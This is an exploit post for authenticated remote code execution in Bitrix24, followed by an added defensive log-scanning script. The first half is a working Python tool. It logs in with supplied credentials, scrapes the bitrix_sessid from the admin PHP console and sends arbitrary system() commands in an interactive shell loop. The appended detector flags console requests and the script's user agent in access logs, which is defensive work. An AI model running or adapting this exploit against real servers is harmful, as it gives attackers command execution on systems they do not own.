
Bitrix24 Remote Code Execution

2022-05-11 17:30
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
# Date: 4/22/2022
# Exploit Author: picaro_o
# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php
# Tested on: Linux os

#/usr/bin/env python
#Created by heinjame
import requests
import re
from bs4 import BeautifulSoup
import argparse,sys

user_agent = {'User-agent': 'HeinJame'}
parser = argparse.ArgumentParser()
parser.add_argument("host", help="Betrix URL")
parser.add_argument("uname", help="Bitrix Username")
parser.add_argument("pass", help="Bitrix Password")
pargs = parser.parse_args()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
inputcmd = input(">>")
s = requests.Session()

def login():
    postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password}
    r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata)

def getsessionid():
    sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en",headers = user_agent)
    session = re.search(r"'bitrix_sessid':.*", sessionid.text)
    extract = session.group(0).split(":")
    realdata = extract[1].strip(" ")
    realdata = realdata.replace("'","")
    realdata = realdata.replace(",","")
    return realdata
    # print(r.text)

def cmdline(cmd,sessionid):
    cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'}
    usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers= user_agent, data = cmdline)
    soup = BeautifulSoup(usercmd.content,'html.parser')
    cmd = soup.find('p').getText()
    print(cmd.rstrip())

login()
sessionid = getsessionid()
while inputcmd != "exit":
    cmdline(inputcmd,sessionid)
    inputcmd = input(">>")
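For defenders, the request sequence in the script above (a GET of the PHP console page followed by POSTs to `php_command_line.php`) can be looked for in web server access logs. The following is an added detection example, not part of the original post; it assumes Combined Log Format, the function names are hypothetical, and the log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Assumption: the web server writes Combined Log Format access logs.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
CONSOLE_PREFIX = "/bitrix/admin/php_command_line"  # path the script above requests
POC_USER_AGENT = "HeinJame"                        # User-agent hard-coded in the script above

# Constructed sample lines (documentation IP ranges, placeholder sessid).
SAMPLE_LOG = """\
203.0.113.7 - - [11/May/2022:17:30:01 +0000] "POST //stream/?login=yes HTTP/1.1" 302 0 "-" "HeinJame"
203.0.113.7 - - [11/May/2022:17:30:02 +0000] "GET /bitrix/admin/php_command_line?lang=en HTTP/1.1" 200 5120 "-" "HeinJame"
203.0.113.7 - - [11/May/2022:17:30:03 +0000] "POST /bitrix/admin/php_command_line.php?lang=en&sessid=PLACEHOLDER HTTP/1.1" 200 311 "-" "HeinJame"
198.51.100.20 - - [11/May/2022:17:31:10 +0000] "GET /bitrix/admin/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.20 - - [11/May/2022:17:32:00 +0000] "POST /bitrix/admin/php_command_line.php?lang=en HTTP/1.1" 403 120 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return a finding dict for a request to the PHP console, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Drop the query string, decode %xx and collapse '//' before matching the path.
    path = re.sub(r"/{2,}", "/", unquote(m["target"].split("?", 1)[0])).lower()
    if not path.startswith(CONSOLE_PREFIX):
        return None
    served = m["status"].startswith("2")
    if served and m["method"] == "POST":
        severity = "high"    # PHP code was submitted and the server answered 2xx
    elif served:
        severity = "medium"  # console page served; its HTML carries bitrix_sessid
    else:
        severity = "low"     # request was refused or redirected
    return {"ip": m["ip"], "time": m["time"], "severity": severity,
            "poc_user_agent": m["ua"] == POC_USER_AGENT}

def scan(log_text):
    """Classify every line and keep only the console findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the exploit is authenticated, a `high` finding means valid credentials were used, so the account behind the session should be reviewed along with the request itself.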


Source: 6400502202-BLW/eussi/moc.ytirucesxc
